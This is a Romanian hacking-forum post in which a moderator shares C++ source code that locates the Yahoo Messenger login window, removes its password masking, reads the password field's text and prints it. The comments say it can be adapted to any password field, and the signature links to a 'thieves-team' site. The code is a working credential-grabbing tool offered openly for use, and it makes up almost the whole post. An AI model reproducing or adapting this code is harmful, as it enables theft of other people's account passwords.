EliteHackers
SALUT 2022!! NE-AM MUTAT PE DISCORD ! Vrei să inviți un prieten? [T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r Acesta aste link-ul oficial al acestui server.
Lista Forumurilor Pe Tematici
EliteHackers | Reguli | Inregistrare | Login

POZE ELITEHACKERS

Nu sunteti logat.
Nou pe simpatie:
GabrielaQueen pe Simpatie
Femeie
19 ani
Galati
cauta Barbat
28 - 67 ani
EliteHackers / Programare / [Script]Y!Password Moderat de Ad_Infinitum, AntiKiler, Puscas_marin, r3v
Autor
Mesaj Pagini: 1
r3v
Moderator

Inregistrat: acum 14 ani
Postari: 1158


Code:

/*
Programmer: Paunoiu Alexandru Dumitru (DranaXum)
Description: This C++ source code demonstrates how we
can get the text from the Password field in Yahoo
Messenger, also it can be easily modified to retrieve
text from any password field
*/

#include<windows.h>
#include<iostream.h>
#include<stdlib.h>
#include<conio.h>

int main()
{
    HWND hwnd; //handle
    LPARAM str; //text to contain password field
    long ret,passc;
    long l; //text length
    
    //start finding password textbox
    hwnd=FindWindow("YahooBuddyMain",0);
    hwnd = FindWindowEx(hwnd, 0, "#32770", "YLoginWnd");
    hwnd = FindWindowEx(hwnd, 0, "Edit", ""); //found User textbox
    hwnd = GetWindow(hwnd, GW_HWNDNEXT); //found Password label
    hwnd = GetWindow(hwnd, GW_HWNDNEXT); //password textbox found!
    //end
    
    //get & set password char
    passc = SendMessage(hwnd, EM_GETPASSWORDCHAR, 0, 0);
    ret = PostMessage(hwnd, EM_SETPASSWORDCHAR, 0, 0);
    //end
    
    //get text length & allocate memory
    l = SendMessage(hwnd, WM_GETTEXTLENGTH,0,0)+1;
    str = (LPARAM)malloc(l);
    //end
    
    //get text & set default password char
    SendMessage(hwnd, WM_GETTEXT, l, str);
    ret = PostMessage(hwnd, EM_SETPASSWORDCHAR, passc, 0);
    //end
    
    //return password field text
    cout<<"Password: "<<(char*)str;
    //end
    
    getch();
    return 0;
}



_______________________________________
http://thieves-team.com
r3vyk.info
mess id: doar prin PM datorita faptului ca mi-au dat add 10000 de retardati care joaca metin

pus acum 14 ani
   
Pagini: 1  

Mergi la